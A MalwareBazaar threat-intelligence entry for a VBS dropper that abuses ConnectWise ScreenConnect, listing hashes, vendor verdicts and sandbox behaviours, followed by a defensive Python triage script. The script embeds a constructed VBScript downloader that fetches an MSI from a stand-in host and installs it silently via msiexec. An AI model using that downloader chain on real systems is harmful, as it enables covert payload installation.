MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

ConnectWise
Vendor detections: 10

SHA256 hash: 046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7
SHA3-384 hash: d7704b9dd9c99148ec042b38d4478810dfb4e805522327110e65f22d68333ca9dc4b7c1f60d94ed4c50d81774c23af12
SHA1 hash: 6f85720bad5d456c7ba758925b965fc6fbc5ae16
MD5 hash: 07521e40c0edeac4d7dc88183586c996
humanhash: maine-equal-kitten-ohio
File name: social-security-statement-upd.vbs
Signature: ConnectWise
File size: 2'119 bytes
First seen: 2025-12-05 22:02:57 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 48:Lv1Wb5tmGwJmXiwJ89wdkyaj8Lz8AExXqIsQ:Lw5URJmJ89wOyaYI/x6IT
Threatray: 1'076 similar samples on MalwareBazaar
TLSH: T1FE41520EDC5DDB642A8301F285689D0AC9B1C423B84A14AC7A4DCC979F315BCCB352EA
Magika: vba
Reporter: Anonymous
Tags: ConnectWise vbs

Intelligence

File Origin
# of uploads: 1
# of downloads: 44
Origin country: US
Vendor Threat Intelligence

No detections

Verdict: Malicious
Score: 92.5%
Tags: trojandownloader connectwise shellcode html

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive expand lolbin lolbin masquerade msiexec rundll32

Verdict: Malicious
File Type: vbs
First seen: 2025-12-03T14:41:00Z UTC
Last seen: 2025-12-06T01:30:00Z UTC
Hits: ~100
Detections: Trojan.JS.SAgent.sb HEUR:Trojan.VBS.SAgent.gen not-a-virus:HEUR:RemoteAdmin.MSIL.ConnectWise.gen

Verdict: Malware
YARA: 1 match(es)
Tags: ADODB.Stream MSXML2.ServerXMLHTTP.6.0 Scripting.FileSystemObject Shell.Application VBScript WScript.Shell

Verdict: Malicious
Threat: RemoteAdmin.MSIL.ConnectWise

Threat name: Win32.Trojan.Egairtigado
Status: Malicious
First seen: 2025-12-03 22:03:58 UTC
File Type: Text (VBS)
AV detection: 9 of 24 (37.50%)
Threat level: 5/5

Result
Malware family: n/a
Score: 8/10
Tags: adware backdoor discovery persistence privilege_escalation rat revoked_codesign spyware
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Program Files directory
Drops file in Windows directory
Boot or Logon Autostart Execution: Authentication Package
Drops file in System32 directory
Enumerates connected drives
Checks computer location settings
ConnectWise ScreenConnect remote access tool
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Badlisted process makes network request
Binary is signed using a ConnectWise certificate revoked for key compromise.
Sets service image path in registry
Please note that we are no longer able to provide a coverage score for VirusTotal.
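Added triage example (not MalwareBazaar's code, nor any vendor's): a Python script showing the two checks a responder would run on a file like this one. First an exact SHA256 lookup against the hash recorded in this entry, then a heuristic for the downloader object chain the vendor tags above list (MSXML2.ServerXMLHTTP.6.0, ADODB.Stream, Scripting.FileSystemObject, WScript.Shell, Shell.Application) combined with the msiexec/rundll32 LOLBins from the sandbox tags. The VBS text inside the block is a constructed test input that reproduces that object chain; it is not the contents of the sample, and its URL is unresolvable by design. The role grouping, function names and verdict labels are assumptions made for the example.

```python
import hashlib
import re

# SHA256 of the sample this entry describes (taken from the entry above).
# A real triage script would load a full IOC feed here instead.
KNOWN_BAD_SHA256 = {
    "046a308ce6f588c842234d66c1bd770176419465a7769df9c98b0834e3fa02c7",
}

# COM ProgIDs from the vendor tags above, grouped by the role they play in a
# VBS downloader (role names are an assumption for this example). Each object
# is legitimate on its own; the combination of an HTTP fetch, a binary file
# write and a shell launch is what makes the pattern worth flagging.
PROGID_ROLE = {
    "MSXML2.ServerXMLHTTP.6.0": "fetch",
    "ADODB.Stream": "write",
    "Scripting.FileSystemObject": "write",
    "WScript.Shell": "exec",
    "Shell.Application": "exec",
}

# LOLBins named in the sandbox tags above.
LOLBIN_RE = re.compile(r"\b(msiexec|rundll32)(?:\.exe)?\b", re.IGNORECASE)

# Constructed test input (NOT the real sample): a minimal script that uses the
# same object chain the tags describe. The host example.invalid never resolves.
SAMPLE_VBS = r'''
Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
http.Open "GET", "http://example.invalid/upd.msi", False
http.Send
Set stm = CreateObject("ADODB.Stream")
stm.Type = 1
stm.Open
stm.Write http.ResponseBody
stm.SaveToFile "C:\Users\Public\upd.msi", 2
Set sh = CreateObject("WScript.Shell")
sh.Run "msiexec /i C:\Users\Public\upd.msi /qn", 0, False
'''


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def find_progids(script: str) -> set:
    """Return the known ProgIDs instantiated via CreateObject in the script.

    VBScript identifiers and string literals here are matched case-insensitively
    because the interpreter itself is case-insensitive.
    """
    found = set()
    for progid in PROGID_ROLE:
        pattern = r'CreateObject\s*\(\s*"' + re.escape(progid) + r'"\s*\)'
        if re.search(pattern, script, re.IGNORECASE):
            found.add(progid)
    return found


def triage(data: bytes) -> dict:
    """Exact hash lookup first, then the behavioural heuristic on the text."""
    digest = sha256_hex(data)
    script = data.decode("utf-8", errors="replace")
    progids = find_progids(script)
    roles = {PROGID_ROLE[p] for p in progids}
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(script)})
    if digest in KNOWN_BAD_SHA256:
        verdict = "known_bad"
    elif {"fetch", "write", "exec"} <= roles:
        verdict = "downloader_pattern"
    elif roles:
        verdict = "suspicious_objects"
    else:
        verdict = "no_match"
    return {
        "sha256": digest,
        "progids": sorted(progids),
        "lolbins": lolbins,
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_VBS.encode("utf-8"))
    for key, value in report.items():
        print(f"{key}: {value}")
```

The hash lookup only catches this exact file; any byte change defeats it, which is why the entry also carries ssdeep and TLSH. The object-chain heuristic is a triage aid, not a verdict: administrative scripts use these same objects, so a "downloader_pattern" hit should send the file to a sandbox rather than straight to a block list.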
